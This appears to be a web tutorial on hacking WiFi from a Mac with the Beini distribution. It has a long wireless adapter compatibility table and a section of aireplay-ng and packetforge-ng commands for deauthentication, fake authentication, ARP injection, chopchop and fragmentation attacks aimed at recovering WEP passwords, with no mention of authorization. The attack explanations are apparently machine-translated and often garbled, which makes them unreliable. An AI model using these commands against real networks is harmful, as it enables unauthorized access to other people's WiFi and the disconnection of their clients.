Background Hacking WiFi on a Mac requires a 3rd party USB WiFi receiver that is compatible with the program that you are using. Kismac has been the only Mac only app that can hack WiFI. However, it is outdated and intolerably slow. In the past your best solution was to run BackTrack in a virtual machine via Parallels, VMware or Virtualbox on your Mac or PC. The main problem with running BackTrack is that it can leave you frustrated with the command line interface and troubleshooting the various problems that pop up during use. While with Beini, you just need to click a few buttons as demonstrated in the video below: BackTrack v Beini packed and doesn't have an attractive user interface. It is an incredibly lightweight download that produces good results. To date, Beini's minidwep-gtk and the feeding bottle applications have proved equally successful in obtaining WEP hex and ASCII passwords. What You Need 1. Virtual machine software (Parallels or VMware or Virtualbox) 2. Beini 1.2.1, 1.2.2 or 1.2.3 iso file (I recommend 1.2.2) 3. Compatible card Beini Compatible Hardware List Do not expect that you will be able to hack WiFi with your default internal WiFi card or Mac's Airport. As stated in the beginning, you will need some compatible hardware, check out the list. I recommend anything with an RTL8187L chip or RT3070 chip or compatible device made by Also devices with directional or yagi antennas work best. If you have a compatible chipset as below, give that a go. The blank sections have unknown compatibility at this time but are likely to be compatible. Product Name (chip) Bus Beini system version 1.0-RC5.2 | 1.0-in Final 1.2.1 1.2.2 1.1 TP-LINK TL-WN321G + Ver: USB Compatible Compatible Compatible Compatible 1.0 (RT73) TP-LINK TL-WN322G + Ver: USB Compatible Compatible 1.0 (ZD1211rw) TP-LINK TL-WN322G + Ver: Not Not Not USB Compatible 2.0 (Atheros 9271) compatible compatible compatible TP-LINK TL-WN422G + Ver: USB Compatible Compatible 1.0 (ZD1211rw) TP-LINK TL-WN422G + Ver: Not Not Not USB Compatible 2.0 (Atheros 9271) compatible compatible compatible TP-LINK TL-WN821N. Ver: USB Compatible Compatible Compatible Compatible 2.0 (Atheros 9.17 thousand) TP-LINK TL-WN821N. Ver: Not Not Not USB Compatible 3.0 (Atheros) compatible compatible compatible TP-LINK TL-WN550G Ver: PCI Compatible Compatible 1.0 (the Atheros 5k) TP-LINK TL-WN551G REV: PCI Compatible Compatible 1.5E (Atheros 5k) TP-LINK TL-WN721N Ver: Not Not Not USB Compatible 1.0 (Atheros 9271) compatible compatible compatible TP-LINK TL-WN722N Ver: Not Not Not USB Compatible 1.0 (Atheros 9271) compatible compatible compatible TP-LINK TL-WN310G Ver: PCMCIA Compatible Compatible 2.4 (Atheros 2413) TP-LINK TL-WN7200ND Ver: USB Compatible 1.0 (RT3070) TP-LINK TL-WN822N Ver: USB Compatible Compatible 1.0 (Atheros AR9170) Asus USB-G31 (RT73) USB Compatible Compatible Compatible Compatible The Asus WL-167g (RT73) USB Compatible Compatible Compatible Compatible The Asus WL-107g (Ralink USB Compatible Compatible 2560) D-Link DWL-G122 H / W Ver: USB Compatible Compatible C1 F / W Ver: 3.00 (RT73) D-Link DWL-G122 H / W Ver: Not Not Not Not F1 F / W Ver: 6.00 USB compatible compatible compatible compatible (RTL8188S) D-Link G the DWA-110 H / W Ver: A1 F / W Ver: 1.00 USB Compatible Compatible (RT73) D-Link DWL-G650 + AH / W Ver: E2 F / W Ver: 5.00 PCMCIA Compatible Compatible Compatible Compatible (Ralink 2561 PCI RT61PCI) D-Link, the DWA-130 H / W Not Not USB Ver: C1 F / W Ver: 1.20 () compatible compatible D-Link, the DWA-130 H / W Not Not USB Ver: C2 F / W Ver: 3.00 () compatible compatible The D-Link, the DWA-133 H / Not Not Not Not USB W Ver: A1 F / W Ver: 1.00 () compatible compatible compatible compatible D-Link DWL-G122 H / W Ver: Not Not Not Not USB F1 F / W Ver: 6.00 () compatible compatible compatible compatible D-Link DWA-125 H / W Ver: Not Not USB Compatible Compatible A2 F / W Ver: 1.30 (RT3070) compatible compatible D-Link DWA-125 H / W Ver: Not Not USB Compatible Compatible A2 F / W Ver: 1.40 (RT3070) compatible compatible FAST FW54U Ver: 5.0 USB Compatible Compatible (ZD1211) FAST FW54U Ver: 7.0 Not Not Not USB Compatible (Atheros 9271) compatible compatible compatible NETGEAR WG111v2 Not USB Compatible Compatible Compatible (RTL8187L) compatible NETGEAR WG111v3 Not Not Not USB Compatible (RTL8187B) compatible compatible compatible NETGEAR WN111v2 USB Compatible Compatible (Atheros AR9170) Not Not IP-COM W321G + () USB compatible compatible Not Not IP-COM W323G + () USB compatible compatible Not Not IP-COM W821U () USB compatible compatible IP-COM W550G V1.0 Not Not (Marvell 88w8335-TGJ1 (rev PCI compatible compatible 03)) Tenda TWL541C (Marvell Not Not PCI 88w8335) compatible compatible Tenda W302P V1.1 Not Not USB (RT2760T) compatible compatible Not Not Tenda W311U (Ralink 2800) USB Compatible Compatible compatible compatible Not Not Not Not Tenda W311Ma USB compatible compatible compatible compatible Not Not Not Not Tenda W311M USB compatible compatible compatible compatible Tenda W541U Ver: 2.0 Not Not USB Compatible Compatible (Ralink 2800) compatible compatible BUFFALO BUF-WLIUCG-1 Not Not (B) MODEL: WLI-UC-G USB compatible compatible (MelCo 0411:0137) Mercurycom (Mercury) USB Compatible Compatible MW54U VER 6.0 (RT73) Mercurycom (Mercury) Not Not Not MW54U VER 7.0 (Atheros USB compatible compatible compatible 9271) SAGEM with (Sagem) XG- USB Compatible Compatible 760N (ZD1211B) SAGEM with (Sagem) XG- USB Compatible Compatible Compatible Compatible 703A (GW3887) INVENTEL the (UBS) ur054g, USB Compatible Compatible Compatible Compatible ( R01 ) V1.1 (GW3887) LinkSys wusb54g V4 USB Compatible Compatible (RT2571F) NEC Aterm WL54AG PCMCIA Compatible Compatible (AR5212) CNet CUA-854L WIFI USB USB Compatible Compatible 11G (RT73) AWUS036NEH (RT2870) USB Compatible Compatible Wireless LAN chip (Intel 2100BG) Mini-PCI Compatible Compatible (Intel 2200BG) Mini-PCI Compatible Compatible (Intel 3945ABG) PCI-E Compatible Compatible Compatible Compatible (Intel 1000BGN) PCI-E Compatible Compatible Compatible Compatible (Intel 5100AGN) PCI-E Compatible Compatible Compatible Compatible (Intel 5300AGN) PCI-E Compatible Compatible (Intel 6000) PCI-E Compatible Compatible (Intel 4965AG) PCI-E Compatible Compatible (Atheros AR5B91) PCI-E (Atheros AR5B93) PCI-E Compatible Compatible Compatible (Atheros AR928X) PCI-E Compatible Compatible Other Notes " When installing the ISO through Parallels or VMware, you need to select 'Other Linux 2.6' When you add the virtual machine. " If Beini cannot detect your card or USB device, delete the devices drivers off your Mac " Get a directional antenna with an SMA connector for better range. Check eBay, Amazon " Track Beini's developments @ google code Modes Explained The -0 Deautenticate [Conflict Mode] Forced to disconnect the connection to reconnect with the routing side has been connected to the legitimate client. Reconnect the packet, resulting in an effective ARP Request. If a client is connected to the routing side, but no one online to produce valid data, then, that the use of also unable to produce an effective ARP the Request. Therefore need to use the -0 attack mode with -3 attack will be immediately activated. aireplay - ng - 0 10 - a < AP MAC > - c < My the MAC > Wifi0 parameters Description: [- ]: conflict attack mode, followed by the number sent (set to 0 , compared with cyclic attacks o f disconnect connection, the client does the Internet) [- ]: set AP MAC [- c ]: the set has been connected to the legitimate client MAC . If you do not s et a - c , then disconnect all and AP connectivity. aireplay - ng - 3 - b < the AP MAC > - h < My MAC > Wifi0 of Note: Using this attack mode the premise must be connected to the router through the certification of a legitimate client This model is to disguise a client and the AP to connect. This step is non-client research study a first step, because no legitimate connection to the client, and therefore need a disguise client and the router is connected to. AP to receive packets, you must make your own card and AP association. If there is no associated target AP will ignore all packets sent from your network card, the IVS data will not produce. -1 Disguised client successfully connected to send into the command, the router receives inject command only after the feedback data to thereby generate the ARP packet. aireplay - ng - 1 0 - e < the AP the ESSID > - a < AP MAC > - h < My the MAC > Wifi0 parameters Description: [- ]: the Camouflage client connection mode, the latter with the delay [- e ]: set AP the of [- a ]: set AP MAC [- h ]: set disguise the client's network card MAC work card MAC ) -2 Interactive, [interactive mode] The interactive mode is a packet capture and mentioning that the data sent attack packets, three with the collection mode A. This mode is mainly used to study learning without the client, to establish a false client connections and direct contracting attack aireplay - ng - 2 - p 0 841 - c ff. : ff : ff : ff : ff : ff - b < the AP MAC > - h < My the MAC Wifi0 parameters Description: [- ]: interactive attack modes [- p ]: set of the information contained in the control frame ( 16 hex), default 0841 [- c ]: set the destination MAC address [- ]: set the AP 's MAC address [- h ]: Set the disguised client network card MAC (ie, card MAC ) 2 . Extract the package, send inject packets aireplay - ng - 2 - the r - x 1024 Wifi0 contracting attacks. which - x 1024 is the contracting speed to avoid the card crashes, you can choose 1024 . -3 ARP Request [injected into the attack mode] This mode is very effective to analyze the process of re-issued in one packet capture after such an attack mode. Both can take advantage of a legitimate client, you can also camouflage the client with the -1 virtual connection. If a legitimate client that generally need to wait a few minutes, so that the communication between the legitimate client and AP, a small amount of data can produce an effective ARP Request only -3 mode into success. If no communication exists, can not get the ARP Request this attack will fail. A long period of time between the legitimate client and AP ARP the Request, you can try to use the -0 attack. If there is no legitimate client, you can use -1 to create a virtual connection camouflage client connection process packet. The resulting ARP Request. ANSI mode injection. aireplay - ng - 3 - b < the AP MAC > - h < My the MAC - x 512 Wifi0 parameters Description: [- 3 ]: ARP injection attack mode [- ]: set AP MAC [- h ]: set [- x ]: the number of households package of the definition to send data per second, but the max imum does not exceed 1024 , it is recommended to use 512 (or not defined) -4 Chopchop [Attack Mode] To a xor file containing the key data in this mode is mainly to get a xor file containing the key data, can not be used to decrypt the packet. But use it to generate a new packet so that we can be injected. aireplay - ng - 4 - b < the AP MAC > - h < My the MAC > Wifi0 parameters Description: [- ]: Set the research study, the AP MAC [- h ]: connection set up a virtual disguise MAC AC ) -5 Fragment [fragmented packet attack mode] Used to obtain PRGA (the suffix containing the key of the xor file) This model one can use PRGA here PRGA is not WEP Key data can not be used to decrypt the packets. But use it to generate a new packet so that we can be injected. Its working principle is the target AP to re-broadcast packets, when the AP re-broadcast, a new IVS will produce, we use this to study the learning! aireplay - ng - 5 - b < the AP MAC > - h < My the MAC > Wifi0 parameters Description: [- ]: fragmented packet attack mode [- ]: set AP MAC [- h ]: Set the virtual camouflage to connect the MAC (ie NIC MAC ) packetforge, - ng : packet manufacturing procedures packetforge - ng packetforge - ng - 0 - a < the AP MAC > - h < My the MAC > Wifi0 - k 255.255 . 255.255 255.255 255.255 - y < xor the file > - w mr parameter Description: [- ]: camouflage ARP packets [- ]: set the AP MAC [- h ]: set up a virtual disguise connection MAC ( MAC ) [- k ]: < ip [: port ]> Description: Set the target file IP and port [- l ]: < ip [: port ]> Description: Set the source file, IP and port [- y ]: < file > Description: xor file . Followed by xor . [- w ]: set camouflage file name